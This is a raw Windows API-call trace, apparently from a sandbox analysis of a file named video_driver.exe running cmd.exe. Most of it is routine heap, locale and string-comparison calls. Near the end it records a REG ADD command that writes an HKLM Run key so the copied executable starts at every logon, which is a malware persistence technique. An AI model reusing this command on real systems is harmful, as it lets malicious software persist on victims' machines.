[0038.545] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0038.546] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0038.546] GetProcessHeap () returned 0x830000 [0038.546] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x54) returned 0x8457f8 [0038.546] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3cf6a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0038.546] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3cf6a0, lpFilePart=0x3cf69c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3cf69c*="Desktop") returned 0x25 [0038.546] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0038.546] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3cf41c | out: lpFindFileData=0x3cf41c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x842010 [0038.546] FindClose (in: hFindFile=0x842010 | out: hFindFile=0x842010) returned 1 [0038.546] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3cf41c | out: lpFindFileData=0x3cf41c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x842010 [0038.546] FindClose (in: hFindFile=0x842010 | out: hFindFile=0x842010) returned 1 [0038.547] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0038.547] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3cf41c | out: lpFindFileData=0x3cf41c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x842010 [0038.547] FindClose (in: hFindFile=0x842010 | out: hFindFile=0x842010) returned 1 [0038.547] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0038.547] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0038.547] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0038.547] GetProcessHeap () returned 0x830000 [0038.547] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x844d08 | out: hHeap=0x830000) returned 1 [0038.547] GetEnvironmentStringsW () returned 0x844218* [0038.547] GetProcessHeap () returned 0x830000 [0038.547] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0xb36) returned 0x845858 [0038.547] FreeEnvironmentStringsW (penv=0x844218) returned 1 [0038.548] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a835260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0038.548] GetProcessHeap () returned 0x830000 [0038.548] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x8457f8 | out: hHeap=0x830000) returned 1 [0038.548] GetProcessHeap () returned 0x830000 [0038.548] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x400e) returned 0x846398 [0038.548] GetProcessHeap () returned 0x830000 [0038.548] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x11a) returned 0x830ff0 [0038.548] GetProcessHeap () returned 0x830000 [0038.548] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x846398 | out: hHeap=0x830000) returned 1 [0038.548] GetConsoleOutputCP () returned 0x1b5 [0038.548] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0038.549] GetUserDefaultLCID () returned 0x409 [0038.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a834950, cchData=8 | out: lpLCData=":") returned 2 [0038.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3cf7e0, cchData=128 | out: lpLCData="0") returned 2 [0038.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3cf7e0, cchData=128 | out: lpLCData="0") returned 2 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3cf7e0, cchData=128 | out: lpLCData="1") returned 2 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a834940, cchData=8 | out: lpLCData="/") returned 2 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a834d80, cchData=32 | out: lpLCData="Mon") returned 4 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a834d40, cchData=32 | out: lpLCData="Tue") returned 4 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a834d00, cchData=32 | out: lpLCData="Wed") returned 4 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a834cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a834c80, cchData=32 | out: lpLCData="Fri") returned 4 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a834c40, cchData=32 | out: lpLCData="Sat") returned 4 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a834c00, cchData=32 | out: lpLCData="Sun") returned 4 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a834930, cchData=8 | out: lpLCData=".") returned 2 [0038.550] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a834920, cchData=8 | out: lpLCData=",") returned 2 [0038.550] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0038.552] GetProcessHeap () returned 0x830000 [0038.552] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x20c) returned 0x842ee8 [0038.552] GetConsoleTitleW (in: lpConsoleTitle=0x842ee8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0038.552] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0038.552] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0038.552] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0038.552] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0038.553] GetProcessHeap () returned 0x830000 [0038.553] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x400a) returned 0x846398 [0038.553] GetProcessHeap () returned 0x830000 [0038.553] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x4008) returned 0x84a3b0 [0038.553] GetProcessHeap () returned 0x830000 [0038.553] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x12) returned 0x831118 [0038.553] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0038.553] GetProcessHeap () returned 0x830000 [0038.553] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x831118 | out: hHeap=0x830000) returned 1 [0038.553] GetProcessHeap () returned 0x830000 [0038.553] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x84a3b0 | out: hHeap=0x830000) returned 1 [0038.553] GetProcessHeap () returned 0x830000 [0038.554] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x846398 | out: hHeap=0x830000) returned 1 [0038.554] _wcsicmp (_String1="REG", _String2=")") returned 73 [0038.554] _wcsicmp (_String1="FOR", _String2="REG") returned -12 [0038.554] _wcsicmp (_String1="FOR/?", _String2="REG") returned -12 [0038.554] _wcsicmp (_String1="IF", _String2="REG") returned -9 [0038.554] _wcsicmp (_String1="IF/?", _String2="REG") returned -9 [0038.554] _wcsicmp (_String1="REM", _String2="REG") returned 6 [0038.554] _wcsicmp (_String1="REM/?", _String2="REG") returned 6 [0038.554] GetProcessHeap () returned 0x830000 [0038.554] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x58) returned 0x831118 [0038.554] GetProcessHeap () returned 0x830000 [0038.554] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x10) returned 0x840070 [0038.559] GetProcessHeap () returned 0x830000 [0038.559] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x14c) returned 0x843100 [0038.560] GetConsoleTitleW (in: lpConsoleTitle=0x3cf4d8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0038.560] _wcsicmp (_String1="REG", _String2="DIR") returned 14 [0038.560] _wcsicmp (_String1="REG", _String2="ERASE") returned 13 [0038.560] _wcsicmp (_String1="REG", _String2="DEL") returned 14 [0038.560] _wcsicmp (_String1="REG", _String2="TYPE") returned -2 [0038.560] _wcsicmp (_String1="REG", _String2="COPY") returned 15 [0038.560] _wcsicmp (_String1="REG", _String2="CD") returned 15 [0038.560] _wcsicmp (_String1="REG", _String2="CHDIR") returned 15 [0038.560] _wcsicmp (_String1="REG", _String2="RENAME") returned -7 [0038.561] _wcsicmp (_String1="REG", _String2="REN") returned -7 [0038.561] _wcsicmp (_String1="REG", _String2="ECHO") returned 13 [0038.561] _wcsicmp (_String1="REG", _String2="SET") returned -1 [0038.561] _wcsicmp (_String1="REG", _String2="PAUSE") returned 2 [0038.561] _wcsicmp (_String1="REG", _String2="DATE") returned 14 [0038.561] _wcsicmp (_String1="REG", _String2="TIME") returned -2 [0038.561] _wcsicmp (_String1="REG", _String2="PROMPT") returned 2 [0038.561] _wcsicmp (_String1="REG", _String2="MD") returned 5 [0038.561] _wcsicmp (_String1="REG", _String2="MKDIR") returned 5 [0038.561] _wcsicmp (_String1="REG", _String2="RD") returned 1 [0038.561] _wcsicmp (_String1="REG", _String2="RMDIR") returned -8 [0038.561] _wcsicmp (_String1="REG", _String2="PATH") returned 2 [0038.561] _wcsicmp (_String1="REG", _String2="GOTO") returned 11 [0038.561] _wcsicmp (_String1="REG", _String2="SHIFT") returned -1 [0038.561] _wcsicmp (_String1="REG", _String2="CLS") returned 15 [0038.561] _wcsicmp (_String1="REG", _String2="CALL") returned 15 [0038.561] _wcsicmp (_String1="REG", _String2="VERIFY") returned -4 [0038.561] _wcsicmp (_String1="REG", _String2="VER") returned -4 [0038.561] _wcsicmp (_String1="REG", _String2="VOL") returned -4 [0038.561] _wcsicmp (_String1="REG", _String2="EXIT") returned 13 [0038.561] _wcsicmp (_String1="REG", _String2="SETLOCAL") returned -1 [0038.561] _wcsicmp (_String1="REG", _String2="ENDLOCAL") returned 13 [0038.561] _wcsicmp (_String1="REG", _String2="TITLE") returned -2 [0038.561] _wcsicmp (_String1="REG", _String2="START") returned -1 [0038.561] _wcsicmp (_String1="REG", _String2="DPATH") returned 14 [0038.561] _wcsicmp (_String1="REG", _String2="KEYS") returned 7 [0038.561] _wcsicmp (_String1="REG", _String2="MOVE") returned 5 [0038.561] _wcsicmp (_String1="REG", _String2="PUSHD") returned 2 [0038.561] _wcsicmp (_String1="REG", _String2="POPD") returned 2 [0038.561] _wcsicmp (_String1="REG", _String2="ASSOC") returned 17 [0038.561] _wcsicmp (_String1="REG", _String2="FTYPE") returned 12 [0038.562] _wcsicmp (_String1="REG", _String2="BREAK") returned 16 [0038.562] _wcsicmp (_String1="REG", _String2="COLOR") returned 15 [0038.562] _wcsicmp (_String1="REG", _String2="MKLINK") returned 5 [0038.562] _wcsicmp (_String1="REG", _String2="DIR") returned 14 [0038.562] _wcsicmp (_String1="REG", _String2="ERASE") returned 13 [0038.562] _wcsicmp (_String1="REG", _String2="DEL") returned 14 [0038.562] _wcsicmp (_String1="REG", _String2="TYPE") returned -2 [0038.562] _wcsicmp (_String1="REG", _String2="COPY") returned 15 [0038.562] _wcsicmp (_String1="REG", _String2="CD") returned 15 [0038.562] _wcsicmp (_String1="REG", _String2="CHDIR") returned 15 [0038.562] _wcsicmp (_String1="REG", _String2="RENAME") returned -7 [0038.562] _wcsicmp (_String1="REG", _String2="REN") returned -7 [0038.562] _wcsicmp (_String1="REG", _String2="ECHO") returned 13 [0038.562] _wcsicmp (_String1="REG", _String2="SET") returned -1 [0038.562] _wcsicmp (_String1="REG", _String2="PAUSE") returned 2 [0038.562] _wcsicmp (_String1="REG", _String2="DATE") returned 14 [0038.562] _wcsicmp (_String1="REG", _String2="TIME") returned -2 [0038.562] _wcsicmp (_String1="REG", _String2="PROMPT") returned 2 [0038.562] _wcsicmp (_String1="REG", _String2="MD") returned 5 [0038.562] _wcsicmp (_String1="REG", _String2="MKDIR") returned 5 [0038.562] _wcsicmp (_String1="REG", _String2="RD") returned 1 [0038.562] _wcsicmp (_String1="REG", _String2="RMDIR") returned -8 [0038.562] _wcsicmp (_String1="REG", _String2="PATH") returned 2 [0038.562] _wcsicmp (_String1="REG", _String2="GOTO") returned 11 [0038.562] _wcsicmp (_String1="REG", _String2="SHIFT") returned -1 [0038.562] _wcsicmp (_String1="REG", _String2="CLS") returned 15 [0038.562] _wcsicmp (_String1="REG", _String2="CALL") returned 15 [0038.562] _wcsicmp (_String1="REG", _String2="VERIFY") returned -4 [0038.563] _wcsicmp (_String1="REG", _String2="VER") returned -4 [0038.563] _wcsicmp (_String1="REG", _String2="VOL") returned -4 [0038.563] _wcsicmp (_String1="REG", _String2="EXIT") returned 13 [0038.563] _wcsicmp (_String1="REG", _String2="SETLOCAL") returned -1 [0038.563] _wcsicmp (_String1="REG", _String2="ENDLOCAL") returned 13 [0038.563] _wcsicmp (_String1="REG", _String2="TITLE") returned -2 [0038.563] _wcsicmp (_String1="REG", _String2="START") returned -1 [0038.563] _wcsicmp (_String1="REG", _String2="DPATH") returned 14 [0038.563] _wcsicmp (_String1="REG", _String2="KEYS") returned 7 [0038.563] _wcsicmp (_String1="REG", _String2="MOVE") returned 5 [0038.563] _wcsicmp (_String1="REG", _String2="PUSHD") returned 2 [0038.563] _wcsicmp (_String1="REG", _String2="POPD") returned 2 [0038.563] _wcsicmp (_String1="REG", _String2="ASSOC") returned 17 [0038.563] _wcsicmp (_String1="REG", _String2="FTYPE") returned 12 [0038.563] _wcsicmp (_String1="REG", _String2="BREAK") returned 16 [0038.563] _wcsicmp (_String1="REG", _String2="COLOR") returned 15 [0038.563] _wcsicmp (_String1="REG", _String2="MKLINK") returned 5 [0038.563] _wcsicmp (_String1="REG", _String2="FOR") returned 12 [0038.563] _wcsicmp (_String1="REG", _String2="IF") returned 9 [0038.563] _wcsicmp (_String1="REG", _String2="REM") returned -6 [0038.563] GetProcessHeap () returned 0x830000 [0038.563] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x210) returned 0x843258 [0038.563] GetProcessHeap () returned 0x830000 [0038.564] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x154) returned 0x843470 [0038.564] _wcsnicmp (_String1="REG", _String2="cmd ", _MaxCount=0x4) returned 15 [0038.564] GetProcessHeap () returned 0x830000 [0038.564] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x418) returned 0x844218 [0038.564] SetErrorMode (uMode=0x0) returned 0x0 [0038.564] SetErrorMode (uMode=0x1) returned 0x0 [0038.564] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x844220, lpFilePart=0x3ceff8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ceff8*="Desktop") returned 0x25 [0038.564] SetErrorMode (uMode=0x0) returned 0x1 [0038.564] GetProcessHeap () returned 0x830000 [0038.564] RtlReAllocateHeap (Heap=0x830000, Flags=0x0, Ptr=0x844218, Size=0x5c) returned 0x844218 [0038.564] GetProcessHeap () returned 0x830000 [0038.564] RtlSizeHeap (HeapHandle=0x830000, Flags=0x0, MemoryPointer=0x844218) returned 0x5c [0038.564] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0038.564] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.565] GetProcessHeap () returned 0x830000 [0038.565] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x120) returned 0x831178 [0038.565] GetProcessHeap () returned 0x830000 [0038.565] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x238) returned 0x844280 [0038.573] GetProcessHeap () returned 0x830000 [0038.574] RtlReAllocateHeap (Heap=0x830000, Flags=0x0, Ptr=0x844280, Size=0x122) returned 0x844280 [0038.574] GetProcessHeap () returned 0x830000 [0038.574] RtlSizeHeap (HeapHandle=0x830000, Flags=0x0, MemoryPointer=0x844280) returned 0x122 [0038.574] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.574] GetProcessHeap () returned 0x830000 [0038.574] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0xe0) returned 0x8435d0 [0038.575] GetProcessHeap () returned 0x830000 [0038.575] RtlReAllocateHeap (Heap=0x830000, Flags=0x0, Ptr=0x8435d0, Size=0x76) returned 0x8435d0 [0038.575] GetProcessHeap () returned 0x830000 [0038.575] RtlSizeHeap (HeapHandle=0x830000, Flags=0x0, MemoryPointer=0x8435d0) returned 0x76 [0038.576] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.576] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x3ced74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ced74) returned 0xffffffff [0038.576] GetLastError () returned 0x2 [0038.576] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\REG", fInfoLevelId=0x1, lpFindFileData=0x3ced74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ced74) returned 0xffffffff [0038.576] GetLastError () returned 0x2 [0038.576] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.577] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x3ced74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ced74) returned 0x843650 [0038.577] GetProcessHeap () returned 0x830000 [0038.577] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x14) returned 0x8312a0 [0038.577] FindClose (in: hFindFile=0x843650 | out: hFindFile=0x843650) returned 1 [0038.577] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x3ced74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ced74) returned 0xffffffff [0038.577] GetLastError () returned 0x2 [0038.577] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x3ced74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ced74) returned 0x843650 [0038.577] GetProcessHeap () returned 0x830000 [0038.577] RtlReAllocateHeap (Heap=0x830000, Flags=0x0, Ptr=0x8312a0, Size=0x4) returned 0x8312a0 [0038.577] FindClose (in: hFindFile=0x843650 | out: hFindFile=0x843650) returned 1 [0038.577] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0038.578] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0038.578] GetConsoleTitleW (in: lpConsoleTitle=0x3cf26c, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0038.578] InitializeProcThreadAttributeList (in: lpAttributeList=0x3cf0f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3cf1bc | out: lpAttributeList=0x3cf0f4, lpSize=0x3cf1bc) returned 1 [0038.578] UpdateProcThreadAttribute (in: lpAttributeList=0x3cf0f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x3cf1b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3cf0f4, lpPreviousValue=0x0) returned 1 [0038.578] GetStartupInfoW (in: lpStartupInfo=0x3cf0b0 | out: lpStartupInfo=0x3cf0b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x13, lpReserved2=0x831a9e, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0038.578] GetProcessHeap () returned 0x830000 [0038.578] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0x18) returned 0x843650 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0038.578] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0038.579] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0038.580] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0038.580] GetProcessHeap () returned 0x830000 [0038.580] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x843650 | out: hHeap=0x830000) returned 1 [0038.580] GetProcessHeap () returned 0x830000 [0038.580] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x8, Size=0xa) returned 0x840088 [0038.580] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0038.581] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe\" /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3cf150*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe\" /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3cf19c | out: lpCommandLine="REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe\" /f", lpProcessInformation=0x3cf19c*(hProcess=0x78, hThread=0x74, dwProcessId=0xb8c, dwThreadId=0x9d8)) returned 1 [0038.606] CloseHandle (hObject=0x74) returned 1 [0038.606] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0038.606] GetProcessHeap () returned 0x830000 [0038.606] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x845858 | out: hHeap=0x830000) returned 1 [0038.606] 